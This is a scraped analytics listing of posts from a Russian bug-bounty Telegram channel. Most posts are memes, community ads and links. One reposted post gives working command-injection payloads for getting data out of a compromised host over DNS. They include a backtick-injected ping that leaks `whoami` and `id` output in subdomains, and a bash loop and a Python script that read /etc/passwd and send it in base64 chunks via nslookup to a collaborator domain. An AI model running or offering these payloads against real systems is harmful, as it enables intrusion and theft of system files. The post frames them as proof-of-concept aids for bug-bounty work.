У вас закончился пробный период!
Для полного доступа к функционалу, пожалуйста, оплатите премиум подписку
BU
Омский багхантер
https://t.me/bughunter_omsk
Возраст канала
Создан
Язык
Японский
1.21%
Вовлеченность по реакциям средняя за неделю
8.97%
Вовлеченность по просмотрам средняя за неделю

По всем вопросам: @arteb123

Сообщения Статистика
Репосты и цитирования
Сети публикаций
Сателлиты
Контакты
История
Топ категорий
Здесь будут отображены главные категории публикаций.
Топ упоминаний
Здесь будут отображены наиболее частые упоминания людей, организаций и мест.
Найдено 17 результатов
9
23
490
https://cheatsheetseries.owasp.org/Glossary.html
20.04.2025, 21:38
t.me/bughunter_omsk/119
18
6
970
21.03.2025, 19:14
t.me/bughunter_omsk/118
395
Смотрите что нашел 😏
15.03.2025, 17:08
t.me/bughunter_omsk/117
11
290
15.03.2025, 17:08
t.me/bughunter_omsk/116
20
468
Добро пожаловать в Омское бб
by @tembitt
3.03.2025, 17:22
t.me/bughunter_omsk/115
Репост
8
2
154
😆 (Не)секретный чатик багхантеров

А вы знаете, что у нашего комьюнити есть чат, в котором общаются исследователи и команда платформы? Там уже больше 250 человек, не хватает только вас!

Залетайте в чат, чтобы:

🔵Общаться с другими хантерами.
🔵Получать помощь и делиться опытом.
🔵Быть на связи с командой платформы.
🔵Оставаться в курсе новостей.
🔵Вместе посещать багбаунти-ивенты.
🔵Делиться мемами и просто болтать о багхантинге.

Присоединяйтесь, будем вместе прокачиваться в работе с уязвимостями ;)
28.02.2025, 12:48
t.me/bughunter_omsk/114
Репост
15
16
216
Встретился тут с ситуацией, когда есть RCE, но вытащить выводы команд можно было только через DNS'ку:


name=val`ping -с 1 $(whoami).collaborator`ue


Получение вывода root в поддомене, конечно, приятно, но хотелось что-то валиднее для PoC'а. Однако, нужно помнить:


Максимальная длина доменного имени, включая поддомены, составляет 253 символа. Однако каждый отдельный уровень домена не может превышать 63 символа.


Поэтому я тут чуть посидел, почитал статейки, сам что-то пописал на баше и получил 2 удобные нагрузки для использования:

Получение части от вывода команды

Логика работы: исполнение команды, обрезание её вывода до диапазона от 1 до 30 символа(далее меняете под себя), после чего это всё кодируется в base64 и отправляется в поддомене


`ping -c 1 $(id | cut -c1-30| base64 | tr -d '=').domain.com`


Чтение всего файла по частям

Логика работы: файл читается построчно, если вся закодированная в base64 строка маленькая(40 символов), то отправляется DNS-запрос с base64 данными в поддомене(перед строкой добавляется L{номер_строки} и дальше уже идут base64 данные). Если строка длиннее, то она отправляется кусками с префиксом для удобства(L{номер_строки}P{какая_часть_от_base64_строки}D и потом данные)


bash -c 'border=40; domain=".collaborator"; delay=3; lineNumber=1; while IFS= read -r line; do encoded=$(echo -n "$line" | base64 | tr -d "="); parts=$(echo "$encoded" | fold -w "$border"); part=1; echo "$parts" | while read -r chunk; do if [ $(echo "$parts" | wc -l) -gt 1 ]; then nslookup "L${lineNumber}P${part}D${chunk}${domain}"; else nslookup "L${lineNumber}${chunk}${domain}"; fi; sleep "$delay"; part=$((part + 1)); done; lineNumber=$((lineNumber + 1)); done < /etc/passwd'


Данный bash я делал по ранее написанному python-коду:


import os, base64, time

border, domain, delay = 40, ".collaborator", 3

with open('/etc/passwd') as file:
for lineNumber, line in enumerate(file, 1):
encoded = base64.b64encode(line.strip().encode()).decode().replace('=', '')
parts = [encoded[i:i+border] for i in range(0, len(encoded), border)]

for part, chunk in enumerate(parts, 1):
os.system(f'nslookup "L{lineNumber}{f"P{part}D" if len(parts) > 1 else ""}{chunk}{domain}"')
time.sleep(delay)


Также попутно хочу поделиться полезными ссылками по этой теме:
- https://notsosecure.com/out-band-exploitation-oob-cheatsheet
- https://github.com/dhmosfunk/DNSEXFIL
- https://gist.github.com/Spix0r/6b38a02be0409ba3679d71c30a6db9a9

P.S. Если base64 не катит, то просто поменяйте на hex
18.02.2025, 17:05
t.me/bughunter_omsk/112
Репост
18
378
18.02.2025, 17:05
t.me/bughunter_omsk/113
8
263
Вы же не забыли отправить «валентинки» в багбаунти программы?
15.02.2025, 20:04
t.me/bughunter_omsk/111
12
81
596
Обнаружил хорошую доку по внутреннему пентесту/редтиму. Рокет сайнса здесь нет, но для актуализации знаний прям что надо.

Тоже самое, но только в виде репозитория: тык
13.02.2025, 11:51
t.me/bughunter_omsk/110
24
1
278
Традиционное базированное фото с любимой
7.02.2025, 10:49
t.me/bughunter_omsk/109
1
279
7.02.2025, 03:03
t.me/bughunter_omsk/108
14
1
283
Получается, слетал в рабочую командировку на концерт Билана..🫡
7.02.2025, 03:03
t.me/bughunter_omsk/107
Получается, слетал в рабочую командировку на концерт Билана..🫡
7.02.2025, 02:59
t.me/bughunter_omsk/106
16
13
278
2.02.2025, 18:14
t.me/bughunter_omsk/105
4
4
305
Тут кажется DeepSeek протек.
Но это же ведь не повод не загружать туда сорцы с апи ключами? 🧐

Хорошая новость - уязвимость уже закрыли.
Плохая новость - уязвимостью уже мог кто-то воспользоваться.
30.01.2025, 01:20
t.me/bughunter_omsk/104
332
Если когда-нибудь на стендоффе выйдет багбаунти с Омской областью, то там будет всего одно недопустимое событие - покинуть Омск
27.01.2025, 22:15
t.me/bughunter_omsk/103
Результаты поиска ограничены до 100 публикаций.
Некоторые возможности доступны только премиум пользователям.
Необходимо оплатить подписку, чтобы пользоваться этим функционалом.
Фильтр
Тип публикаций
Хронология похожих публикаций:
Сначала новые
Похожие публикации не найдены
Сообщения
Найти похожие аватары
Каналы 0
Высокий
Название
Подписчики
По вашему запросу ничего не подошло